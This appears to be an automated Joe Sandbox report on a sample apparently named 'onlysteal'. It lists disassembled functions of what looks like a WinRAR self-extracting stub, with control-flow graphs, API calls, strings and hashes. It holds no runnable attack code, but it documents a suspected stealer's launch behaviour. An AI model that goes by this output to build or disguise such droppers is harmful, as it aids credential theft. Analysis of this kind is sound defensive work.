                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz(
                                      • API String ID: 3049964643-1345951828
                                      • Opcode ID: 32936ba7fba3060a37b83b2c65dfb42acfb40c19961a9212532aa00eac887753
                                      • Instruction ID: 8dd1f1011974a27471719c1a557c86c8b8ffb5d825aa9d3f9fed8b8f3faa3a6b
                                      • Opcode Fuzzy Hash: 32936ba7fba3060a37b83b2c65dfb42acfb40c19961a9212532aa00eac887753
                                      • Instruction Fuzzy Hash: 83610171964205AFD724EFB4FC4DF2B37ACBB45704F01042AF94D922A1DAB49DA8CB61
                                      Function 0024A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 812 24a6c2-24a6df FindResourceW 813 24a6e5-24a6f6 SizeofResource 812->813 814 24a7db 812->814 813->814 816 24a6fc-24a70b LoadResource 813->816 815 24a7dd-24a7e1 814->815 816->814 817 24a711-24a71c LockResource 816->817 817->814 818 24a722-24a737 GlobalAlloc 817->818 819 24a7d3-24a7d9 818->819 820 24a73d-24a746 GlobalLock 818->820 819->815 821 24a7cc-24a7cd GlobalFree 820->821 822 24a74c-24a76a call 250320 CreateStreamOnHGlobal 820->822 821->819 825 24a7c5-24a7c6 GlobalUnlock 822->825 826 24a76c-24a78e call 24a626 822->826 825->821 826->825 831 24a790-24a798 826->831 832 24a7b3-24a7c1 831->832 833 24a79a-24a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 24a7b0 833->834 834->832
                                      APIs
                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0024B73D,00000066), ref: 0024A6D5
                                      • SizeofResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A6EC
                                      • LoadResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A703
                                      • LockResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A712
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0024B73D,00000066), ref: 0024A72D
                                      • GlobalLock.KERNEL32(00000000), ref: 0024A73E
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0024A762
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0024A7C6
                                        • Part of subcall function 0024A626: GdipAlloc.GDIPLUS(00000010), ref: 0024A62C
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0024A7A7
                                      • GlobalFree.KERNEL32(00000000), ref: 0024A7CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 211097158-364855578
                                      • Opcode ID: d2c5051d15e25f9ebfa2011016c1d018b65c53f3d9261fb8283e22d909eb0f5f
                                      • Instruction ID: 3467674bde77ab7bd6c19dfc90265a0b464474bd8727debe20f8c32666717ce5
                                      • Opcode Fuzzy Hash: d2c5051d15e25f9ebfa2011016c1d018b65c53f3d9261fb8283e22d909eb0f5f
                                      • Instruction Fuzzy Hash: CC31A275650302AFD7249F21EC8CD2BBBB9FF89750B044519F809C2260EB71DD64DEA1
                                      Function 0023A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1025 23a69b-23a6bf call 24ec50 1028 23a6c1-23a6ce FindFirstFileW 1025->1028 1029 23a727-23a730 FindNextFileW 1025->1029 1030 23a742-23a7ff call 240602 call 23c310 call 2415da * 3 1028->1030 1031 23a6d0-23a6e2 call 23bb03 1028->1031 1029->1030 1032 23a732-23a740 GetLastError 1029->1032 1038 23a804-23a811 1030->1038 1040 23a6e4-23a6fc FindFirstFileW 1031->1040 1041 23a6fe-23a707 GetLastError 1031->1041 1033 23a719-23a722 1032->1033 1033->1038 1040->1030 1040->1041 1043 23a717 1041->1043 1044 23a709-23a70c 1041->1044 1043->1033 1044->1043 1046 23a70e-23a711 1044->1046 1046->1043 1048 23a713-23a715 1046->1048 1048->1033
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6C4
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6F2
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6FE
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A728
                                      • GetLastError.KERNEL32(?,?,?,?,0023A592,000000FF,?,?), ref: 0023A734
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                      • String ID:
                                      • API String ID: 42610566-0
                                      • Opcode ID: 50e2c7ed994c4878cf761aaef7a8ca4ce88677b968d39ae3633571b144ba98c7
                                      • Instruction ID: 4af2b19bb126aeb989baacd547fd953fa6b54ed71413daa039ece7235cbe7c3e
                                      • Opcode Fuzzy Hash: 50e2c7ed994c4878cf761aaef7a8ca4ce88677b968d39ae3633571b144ba98c7
                                      • Instruction Fuzzy Hash: 88415C72910515ABCB25DF64CCC8AEDF7B8BB49350F1041A6E59AE3200D7746EA5CF90
                                      Function 00257DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002,00000000), ref: 00257E0F
                                      • TerminateProcess.KERNEL32(00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002,00000000), ref: 00257E16
                                      • ExitProcess.KERNEL32 ref: 00257E28
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 374054b54741b914571ae31a357478a011a6fbc0edb7c0a29785ff7125194af4
                                      • Instruction ID: 6c1e8431aa9a126b6034051a7e2269da735b0fe1d10854b1831579ccc25b843f
                                      • Opcode Fuzzy Hash: 374054b54741b914571ae31a357478a011a6fbc0edb7c0a29785ff7125194af4
                                      • Instruction Fuzzy Hash: 9AE0BF31054244ABCF15AF54ED0E9497F69EB50342B008454FD199A172CB75DE69CA94
                                      Function 0023848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: bf56fd77687d75ca91f55363b2acc590950a1c5c42a21e522eafa7a3acb20a98
                                      • Instruction ID: 49feee771b4c85a698bfca77a4ea582622930e2633e35d37cda756fe1b7bcb1c
                                      • Opcode Fuzzy Hash: bf56fd77687d75ca91f55363b2acc590950a1c5c42a21e522eafa7a3acb20a98
                                      • Instruction Fuzzy Hash: 2F820BF1924346AEDF15DF64C891BFAB7B9AF05300F0841B9F8499F142DB705AA9CB60
                                      Function 0024B7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024B7E5
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024B8D1
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B8EF
                                      • IsDialogMessageW.USER32(?,?), ref: 0024B902
                                      • TranslateMessage.USER32(?), ref: 0024B910
                                      • DispatchMessageW.USER32(?), ref: 0024B91A
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0024B93D
                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0024B960
                                      • GetDlgItem.USER32(?,00000068), ref: 0024B983
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024B99E
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024B9B1
                                        • Part of subcall function 0024D453: _wcschr.LIBVCRUNTIME ref: 0024D45C
                                        • Part of subcall function 0024D453: _wcslen.LIBCMT ref: 0024D47D
                                      • SetFocus.USER32(00000000), ref: 0024B9B8
                                      • _swprintf.LIBCMT ref: 0024BA24
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 0024D4D4: GetDlgItem.USER32(00000068,0028FCB8), ref: 0024D4E8
                                        • Part of subcall function 0024D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0024AF07,00000001,?,?,0024B7B9,0026506C,0028FCB8,0028FCB8,00001000,00000000,00000000), ref: 0024D510
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024D51B
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024D529
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D53F
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0024D559
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D59D
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0024D5AB
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D5BA
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D5E1
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002643F4), ref: 0024D5F0
                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0024BA68
                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0024BA90
                                      • GetTickCount.KERNEL32 ref: 0024BAAE
                                      • _swprintf.LIBCMT ref: 0024BAC2
                                      • GetLastError.KERNEL32(?,00000011), ref: 0024BAF4
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0024BB43
                                      • _swprintf.LIBCMT ref: 0024BB7C
                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0024BBD0
                                      • GetCommandLineW.KERNEL32 ref: 0024BBEA
                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0024BC47
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0024BC6F
                                      • Sleep.KERNEL32(00000064), ref: 0024BCB9
                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0024BCE2
                                      • CloseHandle.KERNEL32(00000000), ref: 0024BCEB
                                      • _swprintf.LIBCMT ref: 0024BD1E
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024BD7D
                                      • SetDlgItemTextW.USER32(?,00000065,002635F4), ref: 0024BD94
                                      • GetDlgItem.USER32(?,00000065), ref: 0024BD9D
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0024BDAC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0024BDBB
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024BE68
                                      • _wcslen.LIBCMT ref: 0024BEBE
                                      • _swprintf.LIBCMT ref: 0024BEE8
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0024BF32
                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0024BF4C
                                      • GetDlgItem.USER32(?,00000068), ref: 0024BF55
                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0024BF6B
                                      • GetDlgItem.USER32(?,00000066), ref: 0024BF85
                                      • SetWindowTextW.USER32(00000000,0027A472), ref: 0024BFA7
                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0024C007
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024C01A
                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0024C0BD
                                      • EnableWindow.USER32(00000000,00000000), ref: 0024C197
                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0024C1D9
                                        • Part of subcall function 0024C73F: __EH_prolog.LIBCMT ref: 0024C744
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024C1FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^$$__tmp_rar_sfx_access_check_%u$h$$winrarsfxmappingfile.tmp$Q&
                                      • API String ID: 3829768659-1052983135
                                      • Opcode ID: bdbc6622a6eb8432abaaf6790d67a33030d8f1c334b21b7f310e8d53eec464c4
                                      • Instruction ID: c8a4122b282a25abd8b476b5926cafdda4ade7dca74b74bce3c42217fc373ccb
                                      • Opcode Fuzzy Hash: bdbc6622a6eb8432abaaf6790d67a33030d8f1c334b21b7f310e8d53eec464c4
                                      • Instruction Fuzzy Hash: 2F42E871D64255BAEB26DF74AC4EFBE377CAB01700F100055F649A60E2CBB59AA4CF21
                                      Function 00240863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 268 240863-240886 call 24ec50 GetModuleHandleW 271 2408e7-240b48 268->271 272 240888-24089f GetProcAddress 268->272 273 240c14-240c40 GetModuleFileNameW call 23c29a call 240602 271->273 274 240b4e-240b59 call 2575fb 271->274 275 2408a1-2408b7 272->275 276 2408b9-2408c9 GetProcAddress 272->276 291 240c42-240c4e call 23b146 273->291 274->273 286 240b5f-240b8d GetModuleFileNameW CreateFileW 274->286 275->276 279 2408e5 276->279 280 2408cb-2408e0 276->280 279->271 280->279 288 240b8f-240b9b SetFilePointer 286->288 289 240c08-240c0f CloseHandle 286->289 288->289 292 240b9d-240bb9 ReadFile 288->292 289->273 298 240c50-240c5b call 24081b 291->298 299 240c7d-240ca4 call 23c310 GetFileAttributesW 291->299 292->289 294 240bbb-240be0 292->294 296 240bfd-240c06 call 240371 294->296 296->289 304 240be2-240bfc call 24081b 296->304 298->299 309 240c5d-240c7b CompareStringW 298->309 306 240ca6-240caa 299->306 307 240cae 299->307 304->296 306->291 310 240cac 306->310 311 240cb0-240cb5 307->311 309->299 309->306 310->311 313 240cb7 311->313 314 240cec-240cee 311->314 315 240cb9-240ce0 call 23c310 GetFileAttributesW 313->315 316 240cf4-240d0b call 23c2e4 call 23b146 314->316 317 240dfb-240e05 314->317 323 240ce2-240ce6 315->323 324 240cea 315->324 327 240d73-240da6 call 234092 AllocConsole 316->327 328 240d0d-240d6e call 24081b * 2 call 23e617 call 234092 call 23e617 call 24a7e4 316->328 323->315 326 240ce8 323->326 324->314 326->314 333 240df3-240df5 ExitProcess 327->333 334 240da8-240ded GetCurrentProcessId AttachConsole call 253e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 0024087C
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0024088E
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002408BF
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00240B69
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00240B83
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00240B93
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,|<&,00000000), ref: 00240BB1
                                      • CloseHandle.KERNEL32(00000000), ref: 00240C09
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00240C1E
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<&,?,00000000,?,00000800), ref: 00240C72
                                      • GetFileAttributesW.KERNELBASE(?,?,|<&,00000800,?,00000000,?,00000800), ref: 00240C9C
                                      • GetFileAttributesW.KERNEL32(?,?,D=&,00000800), ref: 00240CD8
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • _swprintf.LIBCMT ref: 00240D4A
                                      • _swprintf.LIBCMT ref: 00240D96
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • AllocConsole.KERNEL32 ref: 00240D9E
                                      • GetCurrentProcessId.KERNEL32 ref: 00240DA8
                                      • AttachConsole.KERNEL32(00000000), ref: 00240DAF
                                      • _wcslen.LIBCMT ref: 00240DC4
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00240DD5
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00240DDC
                                      • Sleep.KERNEL32(00002710), ref: 00240DE7
                                      • FreeConsole.KERNEL32 ref: 00240DED
                                      • ExitProcess.KERNEL32 ref: 00240DF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                      • String ID: (=&$,<&$,@&$0?&$0A&$4B&$8>&$D=&$DXGIDebug.dll$H?&$H@&$HA&$P>&$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=&$`@&$d?&$dA&$dwmapi.dll$h=&$h>&$kernel32$uxtheme.dll$|<&$|?&$|@&$<&$>&$?&$@&$A&
                                      • API String ID: 1207345701-236927283
                                      • Opcode ID: b6c45ccc0f571fb3dec18909d66a242ebf35f6a1a5197f8cb166c245b97c8cdd
                                      • Instruction ID: c8e69fb3dc4826d4195a39102f9e1eff1e9d16217ffe4b78a3a71db78f52e07a
                                      • Opcode Fuzzy Hash: b6c45ccc0f571fb3dec18909d66a242ebf35f6a1a5197f8cb166c245b97c8cdd
                                      • Instruction Fuzzy Hash: FAD196B1428345ABD325DF50D889B9FBAE8BF85704F50491DF68997140C7B086ACCFA2
                                      Function 0024C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 347 24c73f-24c757 call 24eb78 call 24ec50 352 24d40d-24d418 347->352 353 24c75d-24c787 call 24b314 347->353 353->352 356 24c78d-24c792 353->356 357 24c793-24c7a1 356->357 358 24c7a2-24c7b7 call 24af98 357->358 361 24c7b9 358->361 362 24c7bb-24c7d0 call 241fbb 361->362 365 24c7d2-24c7d6 362->365 366 24c7dd-24c7e0 362->366 365->362 367 24c7d8 365->367 368 24c7e6 366->368 369 24d3d9-24d404 call 24b314 366->369 367->369 371 24ca7c-24ca7e 368->371 372 24c7ed-24c7f0 368->372 373 24c9be-24c9c0 368->373 374 24ca5f-24ca61 368->374 369->357 380 24d40a-24d40c 369->380 371->369 377 24ca84-24ca8b 371->377 372->369 379 24c7f6-24c850 call 24a64d call 23bdf3 call 23a544 call 23a67e call 236edb 372->379 373->369 378 24c9c6-24c9d2 373->378 374->369 376 24ca67-24ca77 SetWindowTextW 374->376 376->369 377->369 381 24ca91-24caaa 377->381 382 24c9d4-24c9e5 call 257686 378->382 383 24c9e6-24c9eb 378->383 436 24c98f-24c9a4 call 23a5d1 379->436 380->352 387 24cab2-24cac0 call 253e13 381->387 388 24caac 381->388 382->383 385 24c9f5-24ca00 call 24b48e 383->385 386 24c9ed-24c9f3 383->386 391 24ca05-24ca07 385->391 386->391 387->369 404 24cac6-24cacf 387->404 388->387 398 24ca12-24ca32 call 253e13 call 253e3e 391->398 399 24ca09-24ca10 call 253e13 391->399 424 24ca34-24ca3b 398->424 425 24ca4b-24ca4d 398->425 399->398 405 24cad1-24cad5 404->405 406 24caf8-24cafb 404->406 410 24cad7-24cadf 405->410 411 24cb01-24cb04 405->411 406->411 413 24cbe0-24cbee call 240602 406->413 410->369 416 24cae5-24caf3 call 240602 410->416 418 24cb06-24cb0b 411->418 419 24cb11-24cb2c 411->419 426 24cbf0-24cc04 call 25279b 413->426 416->426 418->413 418->419 437 24cb76-24cb7d 419->437 438 24cb2e-24cb68 419->438 431 24ca42-24ca4a call 257686 424->431 432 24ca3d-24ca3f 424->432 425->369 427 24ca53-24ca5a call 253e2e 425->427 446 24cc06-24cc0a 426->446 447 24cc11-24cc62 call 240602 call 24b1be GetDlgItem SetWindowTextW SendMessageW call 253e49 426->447 427->369 431->425 432->431 453 24c855-24c869 SetFileAttributesW 436->453 454 24c9aa-24c9b9 call 23a55a 436->454 440 24cb7f-24cb97 call 253e13 437->440 441 24cbab-24cbce call 253e13 * 2 437->441 464 24cb6c-24cb6e 438->464 465 24cb6a 438->465 440->441 457 24cb99-24cba6 call 2405da 440->457 441->426 475 24cbd0-24cbde call 2405da 441->475 446->447 452 24cc0c-24cc0e 446->452 482 24cc67-24cc6b 447->482 452->447 458 24c90f-24c91f GetFileAttributesW 453->458 459 24c86f-24c8a2 call 23b991 call 23b690 call 253e13 453->459 454->369 457->441 458->436 470 24c921-24c930 DeleteFileW 458->470 491 24c8a4-24c8b3 call 253e13 459->491 492 24c8b5-24c8c3 call 23bdb4 459->492 464->437 465->464 470->436 474 24c932-24c935 470->474 478 24c939-24c965 call 234092 GetFileAttributesW 474->478 475->426 487 24c937-24c938 478->487 488 24c967-24c97d MoveFileW 478->488 482->369 486 24cc71-24cc85 SendMessageW 482->486 486->369 487->478 488->436 490 24c97f-24c989 MoveFileExW 488->490 490->436 491->492 497 24c8c9-24c908 call 253e13 call 24fff0 491->497 492->454 492->497 497->458
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024C744
                                        • Part of subcall function 0024B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0024B3FB
                                        • Part of subcall function 0024AF98: _wcschr.LIBVCRUNTIME ref: 0024B033
                                      • _wcslen.LIBCMT ref: 0024CA0A
                                      • _wcslen.LIBCMT ref: 0024CA13
                                      • SetWindowTextW.USER32(?,?), ref: 0024CA71
                                      • _wcslen.LIBCMT ref: 0024CAB3
                                      • _wcsrchr.LIBVCRUNTIME ref: 0024CBFB
                                      • GetDlgItem.USER32(?,00000066), ref: 0024CC36
                                      • SetWindowTextW.USER32(00000000,?), ref: 0024CC46
                                      • SendMessageW.USER32(00000000,00000143,00000000,0027A472), ref: 0024CC54
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0024CC7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
